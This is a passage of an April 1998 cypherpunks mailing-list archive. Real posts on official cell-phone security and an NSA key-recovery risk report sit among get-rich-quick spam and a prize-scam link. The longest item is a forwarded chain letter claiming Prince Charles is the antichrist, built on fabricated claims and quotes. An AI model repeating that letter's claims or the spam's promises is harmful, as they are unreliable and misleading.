Date: Fri, 10 Apr 1998 12:15:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: weaken : contact the author
Message-ID: <aa110767ebb317bd9eb70f12df20bbca@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



here's my pk, just drop me a message in the list
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQCNAzUuVR4AAAEEALkjQwGKIsBT16nqJbZsWiPOH6gfRkzFav0RmWgjBu/bjDKe
PmC2aGoQV2FXFYGGnX0bHyBz8Qjewdb7aDg/MQsAXjxsSZvqxNEkXGa6bH4U/Fe8
32WBddLrScc6vikaPv0o3D8bgzr+qQM0s9FSP4n5Jb+N/y2YjJVRLpSyKBl9AAUR
tAVtYXJrb4kAlQMFEDUuVR6VUS6UsigZfQEBI9AD/RM6l/Gmw3+IPNQ1fRSFAME3
ZLoWUC6mAW5kUP0IaOFD/tXGXT+ekehcFojHpk9/QIO1mVpxr3bp97/ETZb1ZJiS
EHTEjAP/85gja/YlRubfihUUb5/MoIz94a+MWsoDB0qLDJbQ48vyNsftNDrolUFf
KUdCME7v3al/m6c0wufP
=Bnx/
-----END PGP PUBLIC KEY BLOCK-----
        






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 10 Apr 1998 16:01:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Secure Cell Phones for State
Message-ID: <199804102301.TAA07614@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Motorola's site is informative (thanks for the pointers and comments), 
and perhaps cannot reveal the detail needed to compare security 
level to other systems in the US and other countries. 

Dave Emery probes the tech questions a bit and I'll go further, with 
Adam Shostack and others, to ask as a citizen why we cannot 
purchase the level of cell phone privacy that our gov and mil folks 
can with our money (a return to the NSA-crippled algo of CMEA 
and CAVE).

There has been some discussion of this on UK Crypto about
the various telco security systems in Europe and the same
critique of a double standard has been made. Cell phone
manufacturers would have a big stake in who gets the best
security to the global public first.

Moreover, as Scientific American points out in its special
section this month, applications of wireless technology are 
rapidly growing for a host of new information distribution,
collection and interactive purposes. The need for security
of this data floating through the spectrum could hardly
be greater, not only for privacy but for prtoection against 
tampering, insertion of disinformation, and a variety of new 
ways to warp data to fit schemes the owners and originators 
never dreamed of. 

Is end to end encryption of the STU-III sort going to be 
needed for all wireless or are there other plans in the works
at TLAs and TIAs?

It would be greatly appreciated if those who may be
tongue-tied by NDA and worse, if we were pointed in the
right direction by, say, semaphore, to the likely places
where we can dig out, say, by FOIA, what we need to 
know about Albright-privileged wireless security.

Finally, are the TAC-2000 units useful for the Secretary's
global travels? If so, are they supported by military networks 
overseas? Or do American officials use a different system
when traveling?

Note: We're commencing a log of this discussion of this 
topic from several lists at:

   http://jya.com/tac-2000.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 10 Apr 1998 17:02:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA on GAK Risks
Message-ID: <199804110002.UAA01785@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Federal Computer Week, April 6, 1998:

NSA report details risks of key-recovery technology

The National Security Agency has prepared a report that may 
be the first federal government documentation of the potential 
risks posed by the encryption technology that has been at the 
center of a raging debate between the Clinton administration 
and industry.

The report, "Threat and Vulnerability Model for Key Recovery," 
pointed out that certain law enforcement agents and officials 
operating key-recovery centers could pose the greatest threat 
to a key-recovery system -- and to the users' data, which is 
encrypted by the system -- if proper security mechanisms were 
not in place.

Full article:

   http://jya.com-krisks.htm  (5K)

Any leads on getting a copy of the NSA report would be
appreciated.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 10 Apr 1998 17:07:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA on GAK Risks (correction)
Message-ID: <199804110007.UAA26257@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Correct URL for full FCW article:

   http://jya.com/nsa-krisks.htm  (5K)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 11 Apr 1998 08:04:01 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: NSA on GAK Risks
In-Reply-To: <199804110002.UAA01785@camel8.mindspring.com>
Message-ID: <199804111503.LAA20078@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199804110002.UAA01785@camel8.mindspring.com>, on 04/10/98 
   at 08:02 PM, John Young <jya@pipeline.com> said:

>Full article:

>   http://jya.com-krisks.htm  (5K)

The URL got munged:

http://www.jya.com/nsa-krisks.htm

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: I love running Windows! NOT!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNS7eUY9Co1n+aLhhAQFnlQP9HKuzBpQTVf6EPIPE4P5t9wha6YJPs2Z1
qxAHcmaIGoDHuoMlKXOvzs47Fds8MrdctoQBCZ/fB9rNxzNyxE6+ag408r2Ia4cf
oSg5dw+ivDpf+1kc1PRfkEJrcxwCggjhH2Kutl3YOz7Ko03oCmXEJYBcFQLXq7Rv
VJqQZ0C6G00=
=pyb0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RSIworks@email1.com
Date: Mon, 13 Apr 1998 01:38:43 -0700 (PDT)
To: TLSuccess@yahoo.com
Subject: <>
Message-ID: <199702170025.gaa08056@nowhere.com>
MIME-Version: 1.0
Content-Type: text/plain


"Our research indicates the following material is of interest to you. If you
prefer NOT to be on this mailing list, please let us know, and you will be
promptly removed."

Please accept my apology if this was sent to you in error!

Corporate America - The Great Life...

..or not! 
Stop and think a minute about your current career.  Are you appreciated?
Are you happy with your present situation?  Can you take a month off and 
increase your salary while on vacation? Do you see yourself in the same 
position 5 years from now?  What about 5 years from that?

If you want more out of life than "Corporate America" can provide, please 
read on.  Are you completely satisfied with the financial status of your 
life? Are you able to STOP working and still earn the kind of money you 
want to?  If so, then delete this message! However, if you'd like to learn 
how to achieve the results you're looking for, keep reading!

Have you ever taken the time to do some serious soul-searching?  Have you 
ever thought about your future and what you really want to do with your 
life?  Over the last several months, I have done just that.  And in doing 
so, I've come to the conclusion that I don't want to be in "Corporate 
America" working for someone else who doesn't appreciate my efforts for 
the rest of my life. I want to be rewarded for my efforts and my work. I
want to have the control and be in business for myself! 

Since I couldn't afford to just walk away from my present career until I 
replaced my income, I started researching businesses that would offer me 
the flexibility to start part-time without interfering with my present job.  
After considerable time researching different businesses, I finally chose 
one that impresses me very much.  There's great potential with virtually no 
investment or risk. 

My company has recently been featured in Success Magazine, The Wall Street 
Journal, Investor's Business Daily, has been ranked in NASDAQ's top 100 
companies and was just ranked #106 in Forbes 200 best small companies in 
America. We are currently experiencing rapid growth nationally and 
internationally and our stock has grown more than 1400% since going public 
only four years ago.

I am currently expanding my team and would be interested in working with 
you directly in this extraordinary business.To obtain a brief "no obligation"
summary of this business please call toll free 1-888-834-7542.  You may also
provide your name, address and phone number at the end of the message to 
receive a free cassette outlining this timely business opportunity in more 
detail.

I look forward to working with you and helping you fulfill your dreams of 
freedom!

Enthusiastically,
Tom & Laura
1-888-834-7542

***** This is a one-time only solicitation. Your address will be deleted from our files. Thank you!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: twointuit@involved.com (gary graves)
Date: Sat, 11 Apr 1998 17:40:30 -0700 (PDT)
To: <cypherpunks-unedited@toad.com>
Subject: make 6 figures working in pajamas!
Message-ID: <000701bd65ab$84d27540$9ca911cf@mic-1>
MIME-Version: 1.0
Content-Type: text/plain




OK, I'm all eye's.
<FONT color=#000000 
size=2>graves@pcez.com


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Schaerer <schaerer@swbell.net>
Date: Sat, 11 Apr 1998 16:59:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Kalifornia Scoffs at Privacy for Minors
Message-ID: <352FF542.22F3@swbell.net>
MIME-Version: 1.0
Content-Type: text/plain


>Eric Cordian wrote:
>> Jim Byrnes writes:
>> > Bwaahaha.  ROTFLOL! No argument over public schools, but families?  Ok,
>> > I'll send my eight year old out to fend for himself.  Its about time
>> > that lazy bum got a job. 
>> 
>> You seem to be under the misperception that since society has entrusted
>> you with the care of a member of a class of individuals having special
>> needs, that such individuals have no civil rights as long as you are
>> giving them something. 
>> 
>> The rights of your biological offspring do not depend in the least on
>> their working to support themselves.  Your legal obligation to provide
>> food, shelter, education, and medical care does not depend in the least
>> upon your getting your own way at their expense 100% of the time, or being
>> allowed to violate their reasonable personal boundaries and limits.

>This legal obligation is another form of slavery, then. Somehow the
>law makes parents slaves to their children.
>
>        - Igor.


... slavery only to yourself - who made the choice to have children in
the first place?  Once you make that choice, you're stuck with it. 
That's not a penalty, just propagation of species: you accept the
responsibility to teach your children what they need to know in order
for them to become functional adults, so they may someday do the same. 
To extend on this 'teaching process', it seems folly to assume that a
child will all-of-a-sudden turn into a thinking, reasonable adult on
their 18th birthday without a certain degree of critical thinking
ability beforehand.

- Jim Schaerer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LocaMaria <LocaMaria@aol.com>
Date: Sun, 12 Apr 1998 04:40:27 -0700 (PDT)
Subject: You've won $50,000
Message-ID: <facff7d0.3530a675@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: LocaMaria@aol.com
Subject: You've won $50,000
From: LocaMaria <LocaMaria@aol.com>
Date: Sun, 12 Apr 1998 07:31:15 EDT
Organization: AOL (http://www.aol.com)

<a href="http://members.tripod.com/~c0wt0wn/driven.html">Click Here To Get
Your Money</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: admin2000@postmaster.co.uk
Date: Sun, 12 Apr 1998 20:02:59 -0700 (PDT)
To: Friend@public.com
Subject: Registered mail
Message-ID: <199804130302.UAA27016@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


You just stumbled upon something big !

Pt or FT !

No competition !No selling ! Not MLM !

$1 - $5,000 per week from home, within 30 days !

Daily conference calls !

Complete training and support !

Leads available !

Dear Friend,	

If your tired of the hype , then read on. 

Everyone wants more and we have the system that can get it.

Over 20,000 doctors, lawyers, CPA's and business people, last year alone, 

started using our system to create wealth in their spare time.

Many are making in excess of $50,000 per month. Speak to them yourself ! " I'm a chiropractor in Hawaii and use this system in my spare time

 to consistently make over $4,000 per week ! " Michael F. Makawao, HI

" I'm a single nurse and mom with 5 kids, have been using the system for 18 months,

 and last year alone, earned $400,000 !  " Melissa F., Parkersburg, IA

" I was a practicing priest for many years, retired and started using this system.

 Last week I earned $33,000 and bought my wife a new van - CASH " Jim P., Port Angeles, WA

These people were taught how to turn a one time investment into big money !

Is the timing right for you ?

Find out on our discovery call. Risk free and pressure free ! We guarantee it !

 888 354 3187	Out of the U.S. 1 619 678 4228 ext. 6093

 To have your name removed form our list,

 send an email with remove in subject to admin2000@postmaster.co.uk.

 We filter against all universal remove lists.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Sun, 12 Apr 1998 20:20:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Who's the Anti-Christ this time?
Message-ID: <5fb7820f.35318464@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>The following is from an email which I received from a Christian group in
>Israel this morning. I think it makes for interesting reading ... 
>
>IMPORTANT WARNING ABOUT PRINCE CHARLES
>
>The following is a list of overwhelming evidence which supports the theory
>that Prince Charles is the biblical antichrist. Although at first glance,
>this claim may seem ridiculous, the facts speak for themselves. You owe it
>to yourself and your family to read this entire document before coming to a
>decision. What else can I say - You've been warned !!!!!!!
>
>#1 - HIS NAME
> Revelations 13:18 "Here is wisdom. Let him that hath understanding count
>the number of the beast: for it is the number of a man; and his number is
>Six hundred threescore and six". According to onomastics (the study of
>names) "charles" literally means "man", in fact the words "charles" and
>"man" are interchangable. So Revelations 13:18 could be interpreted as
>saying "Here is wisdom. Let him that hath understanding count the number of
>the beast: for it is the number of a CHARLES; and his number is Six hundred
>threescore and six." The antichrist is also described in Daniel 9:26 as
>'the prince that shall come'. If Charles is the antichrist then the term
>'prince' can be taken literally.
>
>#2 - HIS NUMBER
>According to hebrew gematria his name adds up to 666 in both English and
>Hebrew (ie., "Charles Prince of Wales" or "nasich charles me wales" - the
>values 1-9 are assigned to the first 9 letters of the alphabet, 10-90 for
>the next 9 letters, and 100-400 for the last four letters, (they only have
>22 characters in the alphabet.) Using this system of math, and applying it
>to the first 22 characters of the English alphabet, (the last 4 letters
>equate to zero), we can calculate names in English just as you can
>calculate names in Hebrew. 
>
>#3a - HIS LINEAGE
>Riddle of the Seven Kings, (the 3rd riddle): In the Book of Revelation,
>Chapter 17, Verses 10-11, it says, "There are seven kings. Five were, one
>is and one is to be. The Beast is the eighth and of the seven." There were
>seven emperors of the Holy Roman Empire named Charles, (check the World
>Book Encyclopedia). Prince Charles' lineage chart shows that he is
>descended, through his father, from the fifth emperor of the Holy Roman
>Empire named Charles, of the House of Hapsburg. Prince Charles is the
>eighth and, (by his lineage), he is also of the seven (SEE HIS LINEAGE
>CHART - http://www.dccsa.com/greatjoy/anti.html).
>
>#3b - HIS LINEAGE
>Since the antichrist will attempt to impersonate the messiah, he will have
>to claim to be a descendant of King David of the house of Judah. It would
>be virtually impossible for any jew alive today to prove that they were
>descended from King David. However, the same cannot be said for Prince
>Charles. In "The Illustrious Lineage of the Royal House Of Britain" (First
>Published in 1902 by The Covenant Publishing Co., Ltd., London, England),
>the authors easily trace his lineage back to David and beyond. The College
>of Heralds (London) has also traced Prince Charles to be the 145th direct
>descendant of King David. This claim was also made in May of last year in a
>documentary on Israeli television. Charles also claims descent from Islam's
>false prophet Mohammed. (SEE HIS LINEAGE CHART -
>http://www.dccsa.com/greatjoy/chart.html).
>
>#4 - HIS COAT OF ARMS / CREST - THE DOG, LION, & UNICORN
>Prince Charles' coat of arms and crest was designed for him by the British
>College of Heraldry, using a system of guidelines over 500 years old. It
>contains ALL the Biblical symbols of the Antichrist. It has a dog supported
>by a roaring lion and a unicorn, (called a wild beast with a straight horn,
>a wild oxen, or 'little horn'). Psalms 22:19-21 describes these animals,
>with a prayer for deliverance...  "Ps 22:19 But be not thou far from me, O
>LORD: O my strength, haste thee to help me.  20 Deliver my soul from the
>sword; my darling from the power of the dog.  21 Save me from the lion's
>mouth: for thou hast heard me from the horns of the unicorns. " (SEE HIS
>COAT OF ARMS - http://www.dccsa.com/greatjoy/crest.html).
>
>#4b - HIS COAT OF ARMS / CREST - THE BEAST
>Revelations 13:2 And the beast which I saw was like unto a leopard, and his
>feet were as the feet of a bear, and his mouth as the mouth of a lion: and
>the dragon gave him his power, and his seat, and great authority. The
>composite beast of Revelation 13:2, with the head of a lion, body of a
>leopard and feet of a bear is symbolic for other people--but not for Prince
>Charles. It is on his Coat of Arms. It represents the emperors of the Holy
>Roman Empire. These are the animal symbols for France, the leopard;
>Germany, the Bear; and England, the lion. These nations represented the
>western arm of the Holy Roman Empire. His Coat of Arms contains ten
>heraldic beasts, which is a first for the British Monarchy. All previous
>British Monarchs had either three or six, but none have ever had ten.
>
>#4c - HIS COAT OF ARMS / CREST - THE RED DRAGON
>Revelations 13:2 also says, "And the dragon gave him his power and his
>throne and great authority." The dragon is "symbolic" to others, but not to
>Prince Charles. He has a red dragon on his coat of arms. It comes from the
>flag of Wales, and it is in this title, Prince of Wales, that Charles is
>heir-apparent to the throne of Great Britain. At his coronation
>(investiture as Prince of Wales) in 1969, he sat on a chair with a large
>red dragon emblazoned on it. During the ceremony, his mother Queen
>Elizabeth II said, "This dragon gives you your power, your throne and your
>authority." His response to her was, "I am now your Leige-man, and worthy
>of your earthly worship." Leige is an old English word meaning "Lord". "I
>am now your Lord-man, and worthy of your earthly worship." Another
>reference to the red dragon is in Revelations 12:3 And there appeared
>another wonder in heaven; and behold a great red dragon, having seven heads
>and ten horns, and seven crowns upon his heads. Prince Charles is the ONLY
>person in the world to whom "And the dragon gave him his power and his
>throne and great authority" can literally be applied to!
>
>#4d - HIS COAT OF ARMS / CREST - THE ORDER OF THE GARTER
>Another symbol on Prince Charles' Coat of Arms is that of The Order of the
>Garter. The Order of the Garter is the parent organization over Free
>Masonry, world-wide. When a man becomes a 33rd Degree Mason, he swears
>allegiance to that organization, and thereby to Prince Charles.  According
>to "The 'Morals and Dogma' of the Ancient and Accepted Rite of Freemasonry"
>written by Albert Pike (Grand Commander, Sovereign Pontiff of Universal
>Freemasonry, July 14, 1889) Lucifer is the GOD of Freemasonry (see page 321
>of the 1942 edition). On page 819 you will find just one example of why
>there are many people in Freemasonry who believe that it is natural to be a
>Christian and a Mason. Masonry intentionally misleads the low degree
>initiates and hides the truth that the god of Freemasonry is Lucifer,
>except to those in the 30th and higher degrees. "The Blue Degrees are but
>the outer court or portico of the Temple. Part of the symbols are displayed
>there to the Initiate, but he is intentionally misled by false
>interpretations. It is not intended that he shall understand them; but it
>is intended that he shall imagine he understands them." Further proof of
>Lucifer worshipping amongst Freemason can be seen in how they measure the
>year. For instance the year 1998 (up until september) is according to
>freemasonry the year 5997 A.L. (that is 5997 anno lucifer).
>
>#4e - HIS COAT OF ARMS / CREST - OTHER SIGNS
>The chain on the unicorn is loose, all previous coats of arms show it
>attached (see II Thessalonians 2:6). Inner motto reads "Evil on him who
>thinks evil". Lower motto reads "I serve", "Service is something that you
>give to people, particularly if they want you to - but sometimes if they
>don't"
>
>#5 - THE MARK OF THE BEAST
>Revelation 13:16 "And he causeth all, both small and great, rich and poor,
>free and bond, to receive a mark in their right hand, or in their
>foreheads." On March 6th, 1996 on CNN, Prince Charles showed the world that
>he and his two sons William and Harry, had been the first people to be
>voluntarily implanted with a microchip (traceable biochip) in their right
>hands,  alledgedly for security purposes. 
>
>#6a - ONE WORLD RELIGION - THE RELIGION OF THE ANTICHRIST
>On June 26th 1994, Charles announced that when he becomes king he will
>relinquish the monarch's role as head of the Church of England. He said he
>would rather be seen as "defender of faith," rather than "defender of the
>faith." "I happen to believe that the Catholic subjects of the sovereign
>are as important [as the Protestants], not to mention the Islamic, Hindu
>and Zoroastrian," he told the Independent Television network.  There are
>currently at least two biographies available on Charles that describe his
>desire to unite all the world's religions 'in order for peace' (see Daniel
>11:37).
>
>#6b - ONE WORLD RELIGION - CHARLES CONVERTS TO ISLAM?
>Various reports have appeared in London and Arab newspapers over the last
>few years, claiming that Charles has converted to Islam. This supposedly
>took place when he met with the mufti of Cyprus Shaykh Nazim Adil (in
>1993). Now while there's no actual evidence to prove that he has converted
>to Islam, there is no evidence to prove that he hasn't. In fact his lecture
>delivered in February 1994 at Oxford extoling the virtues of Islam, his
>frequent visits to Islamic holy places, his dedication of a South London
>mosque, outfitted in traditional Sunnah attire; and his 1993 trip to see
>the Quran of Sayiddina `Uthman (in Tashkent, Uzbekistan) with Shaykh Hisham
>Kabbani, only lend credence to the claim. Of course, this is just the sort
>of tactic to expect from the antichrist. That is to say, if he were to
>openly come out and say that he had converted to Islam, this would make
>many Jews wary of him. Whereas, if he were to spread rumours that he was a
>muslim and not publicly deny them, then he could get muslims onside whilst
>not alienating Jews.
>
>#7 - JACOB'S PILLAR (THE STONE OF DESTINY)
>On June 2nd 1953, with the knights of the garter carrying and holding the
>canopy over her head, Elizabeth II was anoited and crowned as "Queen of thy
>people Israel". Both Prince Charles and his mother believe that the throne
>upon which the queen was crowned, the famous coronation chair at
>Westminster Abbey in London, is the rightful throne of King David. One of
>the reasons for this is because up until recently it contained a 336 pound
>stone known as Jacob's Pillar (also referred to as Jacob's head-rest, the
>stone of Scone, or the stone of destiny). For more information on the
>signifigance of this stone see Genesis 28:18. Legend has it that Jeremiah
>transported it to Ireland where it was used as a coronation stone. It was
>then brought to Scotland where it was used for a millenium to crown Scotish
>Kings. In 1296, Edward I stole the stone and took it to England, where it
>was placed in Westminster Abbey, and used since 1308 for English
>coronations. On St Andrews Day, 30th November 1996, on Queen Elizabeth's
>orders, the stone was taken back to Scotland and installed in Edinburgh
>Castle. I (as do many people) believe that this stone will be used to crown
>the antichrist (posing as the messiah). (See also Ezekiel 21:27, Genesis
>49:10, Daniel 9:24, and Ezekiel 37:22).
>
>#8 - THE ASSASSINATION OF PRINCESS DIANA
>The Pont de l'Alma tunnel, the site where Princess Diana and Dodi Fayed
>were assassinated has great occultic signifigance. The site is ancient,
>dating back to the time of the Merovingian kings (ca. 500 - 751 A.D.), and
>before. In pre-Christian times, the Pont de l'Alma was an underground
>chamber and used as a pagan sacrificial site. The Founder of the
>Merovingian dynasty was Merovaeus, said to be descended from the union of a
>sea creature and a French queen. Merovaeus followed the pagan cult of
>Diana. In Middle English, "soul" (Alma) has as etymology "descended from
>the sea." "Pont," has as a Latin root "pontifex," meaning a Roman high
>priest. (See also pons, pontis -- bridge; passage.) " One translation of
>Pont de l'Alma would be "bridge of the soul." If Charles is the antichrist,
>then I wonder what Diana would have had to say (had she lived) when he
>declares himself the messiah, and how many people would've taken her
>opinion into consideration before believing his claims!
>
>#9 - THE PRIORY OF SION & THE MEROVINGIANS
>Many blasphemous European royalty including Prince Charles and Queen
>Elizabeth II claim to be of the Blood line of Jesus Christ and Mary
>Magdalene. According to the lie, Jesus didn't die on the cross and rise
>from the dead. Instead they claim he married Mary Magdalene and fathered a
>number of children. This bloodline is referred to as the "Holy Grail", with
>those possessing it believing themselves the rightful heirs to the throne
>of Jerusalem. They believe that a new king of "the holy seed of David" will
>preside over the "Masonic kingdom" of Israel and the world. Prince Charles'
>link to the non-existant bloodline of Christ is through the Merovingian
>Kings of France. He is alledgedly descended from the Merovingian
>Hildegarde. Princess Diana's Bloodline can also be traced back to the
>Merovingians. This is why Prince Philip selected her.
>
>If the above examples aren't enough to convince you then here are a few
>more facts to take into consideration ...
>
>- Prince Charles is heir to the highest ranking office on earth to be
>attained solely by birthright.
>
>- Israel became a state in 1948. Prince Charles was born in 1948.
>
>- In 1992 (just before the full unification in 1993) Charles applied to the
>EU (European Union) to be made King of Europe. He was turned down by the
>European parliment, but has since developed enormous support among European
>royalty and the moneyed elite.
>
>- Prince Charles' own business forum website is at http://www.oneworld.org.
>His World Business Forum comprises 200 of the world's top corporate leaders
>and consolidates 26% of the world's wealth. Charles is literally able to
>steer the environmental ethics & business agendas of the world's most
>powerful multinational companies.
>
>- The holdings of the House of Windsor constitute enormous wealth including
>the Archer-Daniels-Midland company (they are stockholders with controlling
>interest) which controls 75% of the world's grain. In times of famine, the
>royal family will literally be able to control who eats and who starves.
>
>- Prince Charles considers himself to be psychic and believes in guidance
>from the spirit realm. The Queen (also involved in spiritism) and Prince
>Philip both believe that Charles, "is the Chosen One - placed  in line for
>the throne through a divine, preordained plan." 
>
>- In 1977, Charles went to Ghana, Africa where he claimed to have had a
>mystical experience. The news reports quoted him as saying that it was
>like, "St. Paul's conversion on the road to Damascus."
>
>- One of Prince Charles' key men is the Canadian Maurice Strong. Strong is
>a top Illuminati operative and head of many world organizations. He has
>been under secretary of the U.N. for many years. He headed up the Rio
>Summit, World Conservation Bank, World Economic Forum, U.N. Commission on
>Global governance. He is also chairman of the Earth Council and the World
>Resources Institute and has been a top player in Planetary Citizens, the
>World Future Society, Aspen Institute, Business Council for Sustainable
>Development, Lindisfarne Association, World Federation of United Nations
>Associations, the Club of Rome, and about 30 other major organizations - to
>name but a few of his powerful  connections.
>
>- To give you some idea of Charles' influence: He is behind three of the
>most important documents of this decade, the U.N.'s Global Security
>Programme (he personally initiated the United Nations Global Security
>Program), the 7 Year Oslo Accord, and the Rio Summit's `Agenda 21'. Up
>until recently he headed the United World Colleges, he is credited with
>instigating alternative medicine, and with the success of the 1992 Earth
>Summit in Rio De Janeiro.
>
>- According to an article which appeared in the London Times on July 15th,
>1998, titled "The Charles And Tony Show" many Britons are becoming
>concerned about Prince Charles' meddling in the daily political affairs of
>the Tony Blair government. To quote the article "Charles' involvement is
>causing considerable controversy in certain British quarters, who claim
>that he is over-stepping the bounds, of publicly allowable behavior, by a
>member of the Royal Family, in daily political events.
>
>- In the early 1990's representatives of Israel and the Palestinians were
>invited to a secret meeting in London, during which it was decided to try
>secret negotiations in Oslo, Norway. The Israelis were represented by
>Yitzchak Rabin, and the Palestinians were represented by King Hussein of
>Jordan (both 33rd degree masons). The third party at that meeting was Lord
>Victor Mischcon (also a 33rd degree mason), and personal attorney for
>Prince Charles. 
>
>- Prince Charles attended the funeral of Yitzchak Rabin. Within two hours
>after the funeral, according to the Jerusalem Post, Prince Charles was in
>Prime Minister Shimon Peres' office "insisting" that he attend a meeting at
>the Orient House, (in the Palestinian sector of Jerusalem), to begin
>negotiations to give back the Golan Heights to Syria. (IMPORTANT: SEE
>http://www.dccsa.com/greatjoy/coincidences.html).
>
>- An article appeared in the Sunday Mirror on August 31 1997 (only hours
>before Princess Diana was assassinated). It was titled "Queen To Strip
>Harrods of Its Royal Quest" (by Andrew Golden). To quote the article
>"Prince Philip, in particular, has made no secret as to how he feels about
>his daughter-in-law's latest man, referring to Dodi as an `oily
>bed-hopper." "He's been banging on about his contempt for Dodi and how he
>is undesirable as a future stepfather to William and Harry. Diana has been
>told in no uncertain terms about the consequences should she continue the
>relationship with the Fayed boy. Options must include possible exile,
>although that would be very difficult as when all is said and done, she is
>the mother of the future King of England."
>
>- According to Prince Charles "I am sure that many people consider that the
>United Kingdom is in an ideal geographical and historical position to act
>as an interpreter and mediator between the United States and Europe."
>
>- In 1991, as his son William was undergoing emergency surgery for a
>near-fatal head wound, "Prince charles left the hospital to go to Covent
>Garden Opera House, where he was to host a party of European Community
>officials.
>
>- To truly understand Charles, it is important to understand his father,
>Prince Philip. Philip is a eugenicist who wants reduce the population of
>this planet from a current level of about 5.3 billions persons, to much
>less than 1 billion within the next two generations. To quote Prince Philip
>- "In the event that I am reincarnated, I would like to return as a deadly
>virus, in order to contribute something to solve overpopulation." And
>Philip is off to a flying start. He is the head of the World Wildlife Fund
>(Worldwide Fund for Nature) an organisation whose policies are not only
>responsible for the extinction of many species of animals but also for the
>deaths of literally millions of sub-saharan Africans. Although Philip
>pretends to be a champion on endangered species, in January 1961, a few
>months before he would launch of the World Wildlife Fund (WWF) Prince
>Philip went on a royal tour of India where he not only shot and killed an
>Indian tiger (check news achives for the photo) but also an exceedingly
>rare Indian rhinoceros. Only 250 were then left in the world, but that
>didn't stop Philip from shooting it. The dead rhino's terrified calf
>managed to escape but probably died later as it was so young. In a May
>18th, 1990 address to the National Press Club in Washington, D.C., Prince
>Philip asserted: ``it is now apparent that the ecological pragmatism of the
>so-called pagan religions, such as that of the American Indians, the
>Polynesians, and the Australian Aborigines, was a great deal more realistic
>in terms of conservation ethics than the more intellectual monotheistic
>philosophies of the revealed religions.'' (Like father, like son!)
>
>- Prince Charles may seem like a wimp, however he is quite athletic, an
>expert horseman, a qualified jet fighter pilot in the Royal Air Force, a
>qualified helicopter pilot in the Royal Navy, and a senior military officer
>in all three branches of armed services.
>
>- Some of the rumours to have dogged Charles over the years include
>homosexuality, adultery, occultic practices and spiritualist worship.
>
>- No one else on Earth has the religious, political, financial, historic,
>and other ties that Charles has!
>
>- Prince Charle's media exposure has exceeded that of any other man in
>history!
>
>- Only the true antichrist can fulfill every biblical prophecy (WITHOUT
>EXCEPTION) related to the antichrist. Daniel 9:26-27 clearly states that
>the antichrist must be a prominent ruler, (presumably a prince of Roman
>lineage)!
>
>- If Charles is the antichrist then he should receive a fatal head wound,
>sometime in the near future. A fatal head wound from which he will
>miraculously recover!
>
>There are many more so called coincidences, but don't take my word for it,
>read your bible, goto your library, lookup old newspapers, and keep an eye
>on the so-called Royal family. Still not convinced, then read
>2Thessalonians 2:9-2:12 ...
>
>Even him, whose coming is after the working of Satan with all power and
>signs and lying wonders, And with all deceivableness of unrighteousness in
>them that perish; because they received not the love of the truth, that
>they might be saved. And for this cause God shall send them strong
>delusion, that they should believe a lie: That they all might be damned who
>believed not the truth, but had pleasure in unrighteousness.
>
>You've been warned !!!!!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody <nobody@aardvark.zoo.net>
Date: Sun, 12 Apr 1998 23:58:57 -0700 (PDT)
To: kooneoks@rsl.park.tartu.ee
Subject: Forget Direct Mail... Electronic Marketing is the Way of the Future !!!
Message-ID: <62435.3875.19476.463.581@rsl.park.tartu.ee>
MIME-Version: 1.0
Content-Type: text/plain


            Forget Direct Mail... Electronic Marketing is the Way of the Future

In  order to sell  your  products, they have to advertised.  ... And in order for you to
buy them, they have to be advertised. You always  need  customers. What  better
way to find customers that  you need? Through emailing. What faster way to send
Ads, Letters and Flyers to millions of people? Through emailing.

Why  spend  up  to  32  cents  per envelope you mail (not including printing costs)
when you can mail to virtually the same  people  for  FREE? Think about it, to mail
1000 envelopes or postcards it would cost around $320. And that's after you have
bought the mailing list which can run  about $300 for  a  good one. Best of all, you
don't  have  to  wait 6 to 7  days for your response - you will get it that very day. In
fact, check your email right after  mailing 500 and  there will  more than likely be at
least  2  to  5  responses  waiting  for you already! Best  of  all  each one  of  these
commercial  mailings  will  cost  you  ABSOLUTELY  NOTING. You can send ONE
